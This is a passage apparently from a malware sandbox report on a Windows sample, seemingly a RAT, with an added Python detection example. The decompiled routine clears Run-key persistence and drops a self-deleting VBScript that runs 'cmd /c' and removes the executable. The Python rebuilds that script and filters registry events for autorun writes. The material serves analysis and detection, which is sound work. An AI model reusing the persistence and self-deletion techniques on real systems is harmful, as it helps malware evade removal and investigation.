                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                        • exit.MSVCRT ref: 00408980
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1819783940-1536747724
                                        • Opcode ID: 5d84789943ac91f38d4bcb19be325d2da9fe4f3b99244500e455f64aba4d7c7c
                                        • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                        • Opcode Fuzzy Hash: 5d84789943ac91f38d4bcb19be325d2da9fe4f3b99244500e455f64aba4d7c7c
                                        • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E00408245() {
                                        				char _v0;
                                        				signed int _v5;
                                        				char _v6;
                                        				signed int _v9;
                                        				char _v10;
                                        				char _v24;
                                        				char _v28;
                                        				char _v40;
                                        				char _v44;
                                        				char _v56;
                                        				char _v60;
                                        				char _v72;
                                        				char _v76;
                                        				char _v88;
                                        				char _v92;
                                        				void* _v108;
                                        				void* _v124;
                                        				void _v606;
                                        				short _v608;
                                        				short _v644;
                                        				void* _t112;
                                        				void* _t114;
                                        				char* _t116;
                                        				WCHAR* _t118;
                                        				signed char _t120;
                                        				char* _t121;
                                        				char* _t123;
                                        				char* _t126;
                                        				char* _t127;
                                        				char* _t128;
                                        				short* _t131;
                                        				void* _t132;
                                        				char* _t134;
                                        				WCHAR* _t137;
                                        				char* _t138;
                                        				char* _t140;
                                        				char* _t143;
                                        				char* _t144;
                                        				char* _t145;
                                        				char* _t146;
                                        				signed int* _t148;
                                        				char* _t149;
                                        				char* _t150;
                                        				signed int _t151;
                                        				short* _t153;
                                        				char* _t154;
                                        				char* _t155;
                                        				WCHAR* _t157;
                                        				char* _t158;
                                        				char* _t159;
                                        				char* _t163;
                                        				WCHAR* _t165;
                                        				char* _t166;
                                        				char* _t167;
                                        				intOrPtr* _t174;
                                        				short* _t285;
                                        				void* _t297;
                                        				void* _t299;
                                        				void* _t301;
                                        				void* _t303;
                                        				void* _t304;
                                        				void* _t305;
                                        				void* _t306;
                                        				void* _t308;
                                        				void* _t310;
                                        
                                        				_t112 = E0040AC8C();
                                        				if( *0x41b154 != 0x30) {
                                        					_t112 = E00406D41(0x41b900);
                                        				}
                                        				if( *0x41c118 == 1) {
                                        					_t112 = E0041050F(_t112);
                                        				}
                                        				if( *0x41b22a != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t112 = E00412BEE(_t112);
                                        				}
                                        				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                        				if( *0x41ba58 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
                                        					_t297 = _t297 + 0xc;
                                        				}
                                        				if( *0x41bc64 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t112 = E0040B9E8(0x80000002, _t172, _t112);
                                        					_t297 = _t297 + 0xc;
                                        				}
                                        				if( *0x41ba20 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
                                        					_t297 = _t297 + 0xc;
                                        				}
                                        				_v608 = _v608 & 0x00000000;
                                        				_t114 = memset( &_v606, 0, 0x81 << 2);
                                        				asm("stosw");
                                        				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
                                        				_t299 = _t297 + 0x28;
                                        				if(_t116 == 0) {
                                        					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
                                        				}
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				RegDeleteKeyA(0x80000001, _t116);
                                        				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
                                        				_v5 = 1;
                                        				_t118 =  *_t174(0x41bc68, 0x415800);
                                        				if(_t118 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					SetFileAttributesW(_t118, 0x80);
                                        				}
                                        				_t120 = SetFileAttributesW( &_v608, 0x80);
                                        				if(_t120 == 0) {
                                        					_v5 = _v5 & _t120;
                                        				}
                                        				_t121 =  &_v6;
                                        				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
                                        				L00414146();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
                                        				_t123 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
                                        				L0041416A();
                                        				_t301 = _t299 + 0x18;
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
                                        				if(_v5 != 0) {
                                        					_t165 =  &_v608;
                                        					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
                                        					_t166 =  &_v72;
                                        					L0041416A();
                                        					_t167 =  &_v40;
                                        					L00414146();
                                        					_t301 = _t301 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				_t126 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
                                        				_t127 =  &_v72;
                                        				L00414146();
                                        				_t128 =  &_v56;
                                        				L00414146();
                                        				_t303 = _t301 + 0x18;
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_v5 != 0) {
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                        				}
                                        				_push(0x415800);
                                        				_push(0x41bc68);
                                        				if( *_t174() != 0) {
                                        					_t163 =  &_v72;
                                        					L0041416A();
                                        					_t129 =  &_v56;
                                        					L00414146();
                                        					_t303 = _t303 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
                                        				_t304 = _t303 + 0x10;
                                        				if(_t131 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
                                        				}
                                        				exit(0);
                                        				_pop(_t280);
                                        				_pop(_t291);
                                        				_pop(_t175);
                                        				_t305 = _t304 - 0x27c;
                                        				_t132 = E0040AC8C();
                                        				if( *0x41b154 != 0x30) {
                                        					_t132 = E00406D41(0x41b900);
                                        				}
                                        				if( *0x41c118 == 1) {
                                        					_t132 = E0041050F(_t132);
                                        				}
                                        				if( *0x41b22a != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t132 = E00412BEE(_t132);
                                        				}
                                        				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                        				if( *0x41ba58 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
                                        					_t305 = _t305 + 0xc;
                                        				}
                                        				if( *0x41bc64 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t132 = E0040B9E8(0x80000002, _t176, _t132);
                                        					_t305 = _t305 + 0xc;
                                        				}
                                        				if( *0x41ba20 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
                                        					_t305 = _t305 + 0xc;
                                        				}
                                        				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
                                        				_t306 = _t305 + 0x1c;
                                        				if(_t134 == 0) {
                                        					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
                                        				}
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				RegDeleteKeyA(0x80000001, _t134);
                                        				_v9 = 1;
                                        				_t137 = SetFileAttributesW( &_v644, 0x80);
                                        				if(_t137 == 0) {
                                        					_v9 = _v9 & _t137;
                                        				}
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                        				if(_t137 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					SetFileAttributesW(_t137, 0x80);
                                        				}
                                        				_t138 =  &_v10;
                                        				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
                                        				L00414146();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
                                        				_t140 =  &_v10;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
                                        				L0041416A();
                                        				_t308 = _t306 + 0x18;
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
                                        				if(_v9 != 0) {
                                        					_t157 =  &_v644;
                                        					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
                                        					_t158 =  &_v76;
                                        					L0041416A();
                                        					_t159 =  &_v28;
                                        					L00414146();
                                        					_t308 = _t308 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				_t285 = L"\"\n";
                                        				_t143 =  &_v10;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
                                        				_t144 =  &_v76;
                                        				L00414146();
                                        				_t145 =  &_v60;
                                        				L00414146();
                                        				_t310 = _t308 + 0x18;
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_v9 != 0) {
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                        				}
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                        				if(_t145 != 0) {
                                        					_t154 =  &_v76;
                                        					L0041416A();
                                        					_t155 =  &_v60;
                                        					L00414146();
                                        					_t310 = _t310 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				_t146 =  &_v10;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
                                        				_t148 =  &_v9;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
                                        				_t149 =  &_v28;
                                        				L0041414C();
                                        				_t150 =  &_v76;
                                        				L0041414C();
                                        				_t151 =  &_v60;
                                        				L00414146();
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
                                        				if(_t153 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
                                        					if(_t153 > 0x20) {
                                        						exit(0);
                                        					}
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t153;
                                        			}
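The tail of the routine above is the sample's uninstall path: it calls E0040B9E8 against the three autorun locations (HKCU ...\CurrentVersion\Run, HKLM ...\CurrentVersion\Run, HKLM ...\Policies\Explorer\Run), reads the `exepath` value and deletes its HKCU key with RegDeleteKeyA, resets the attributes of its own executable with SetFileAttributesW(..., 0x80 = FILE_ATTRIBUTE_NORMAL), and then concatenates a VBScript under %Temp% that waits in a `while fso.FileExists(...)` loop until the executable can be deleted (only when the attribute reset succeeded, `_v9`), removes the install folder when the wide string at 0x41bc68 is non-empty, runs a `cmd /c` line through WScript.Shell, and finally deletes itself via `Wscript.ScriptFullName`. The file is written through E00412D56 (CreateFileW), launched with ShellExecuteW "open", and the process calls exit(0) when ShellExecuteW returns more than 32. The Python below is an added example, not code from this report or from the sample: it rebuilds the dropped script from the string constants visible in the decompilation (the `cmd /c` argument is a placeholder, because the listing does not show the buffer `_v0`; all paths are made up), scores a script body for that self-deleting cleanup shape, and filters constructed Sysmon-style registry events for writes to the autorun keys the routine touches.

```python
"""Reconstruct and detect the self-deleting uninstall VBScript assembled by the
routine above. Added example: not from the sandbox report or the sample itself.
The script layout follows the string constants in the decompilation; the paths,
the cmd /c argument and the Sysmon-style events below are constructed."""

# String constants the routine concatenates, keyed by what each piece does.
MARKERS = {
    "fso_create": 'CreateObject("Scripting.FileSystemObject")',
    "on_error": "On Error Resume Next",
    "wait_loop": "while fso.FileExists(",
    "delete_file": 'fso.DeleteFile "',
    "loop_end": "wend",
    "delete_folder": 'fso.DeleteFolder "',
    "shell_run": '("WScript.Shell").Run "cmd /c ""',
    "self_delete": "fso.DeleteFile(Wscript.ScriptFullName)",
}

# Autorun locations passed to E0040B9E8 (HKCU Run, HKLM Run and
# HKLM Policies\Explorer\Run share these two suffixes).
RUN_KEYS = (
    "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
    "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\",
)


def build_uninstall_vbs(exe_path, install_dir="", cmd_arg="", wait_for_exit=True):
    """Assemble the script body in the same order as the decompiled routine.
    wait_for_exit mirrors _v9 (set when SetFileAttributesW succeeded),
    install_dir mirrors the string at 0x41bc68, and cmd_arg is an assumed
    stand-in for the buffer _v0 that the listing does not show."""
    lines = ['Set fso = CreateObject("Scripting.FileSystemObject")',
             "On Error Resume Next"]
    if wait_for_exit:
        lines.append('while fso.FileExists("%s")' % exe_path)
    lines.append('fso.DeleteFile "%s"' % exe_path)
    if wait_for_exit:
        lines.append("wend")
    if install_dir:
        lines.append('fso.DeleteFolder "%s"' % install_dir)
    lines.append('CreateObject("WScript.Shell").Run "cmd /c ""%s""", 0' % cmd_arg)
    lines.append("fso.DeleteFile(Wscript.ScriptFullName)")
    return "\n".join(lines)


def scan_script(text):
    """Names of the markers present in a script body (case-insensitive)."""
    low = text.lower()
    return {name for name, needle in MARKERS.items() if needle.lower() in low}


def is_self_deleting_cleanup(text):
    """Verdict for a script found under %Temp%: it removes itself through
    ScriptFullName and deletes another file or folder with the same
    FileSystemObject, which is the shape build_uninstall_vbs produces."""
    hits = scan_script(text)
    return ("self_delete" in hits and "fso_create" in hits
            and bool(hits & {"delete_file", "delete_folder"}))


def run_key_writes(events):
    """Sysmon EventID 13 (value set) records whose TargetObject lies under one
    of the autorun keys the routine touches; events is a list of dicts."""
    return [e for e in events
            if e["EventID"] == 13
            and any(k.lower() in e["TargetObject"].lower() for k in RUN_KEYS)]


# Constructed sample input; no real host data.
EXE = "C:\\Users\\victim\\AppData\\Roaming\\remcos\\remcos.exe"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": EXE,
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Remcos",
     "Details": EXE},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\Updater",
     "Details": "C:\\ProgramData\\upd.exe"},
    {"EventID": 13, "Image": "C:\\Program Files\\App\\app.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\App\\DisplayName",
     "Details": "App"},
    {"EventID": 12, "Image": EXE,  # key create/delete, not a value write
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"},
]
BENIGN_VBS = ('Set fso = CreateObject("Scripting.FileSystemObject")\n'
              'fso.DeleteFile "C:\\Temp\\old.log"')


if __name__ == "__main__":
    vbs = build_uninstall_vbs(EXE, install_dir=EXE.rsplit("\\", 1)[0], cmd_arg="echo")
    print(vbs)
    print(sorted(scan_script(vbs)), is_self_deleting_cleanup(vbs))
    print("benign flagged:", is_self_deleting_cleanup(BENIGN_VBS))
    for ev in run_key_writes(SAMPLE_EVENTS):
        print("autorun write:", ev["Image"], "->", ev["TargetObject"])
```

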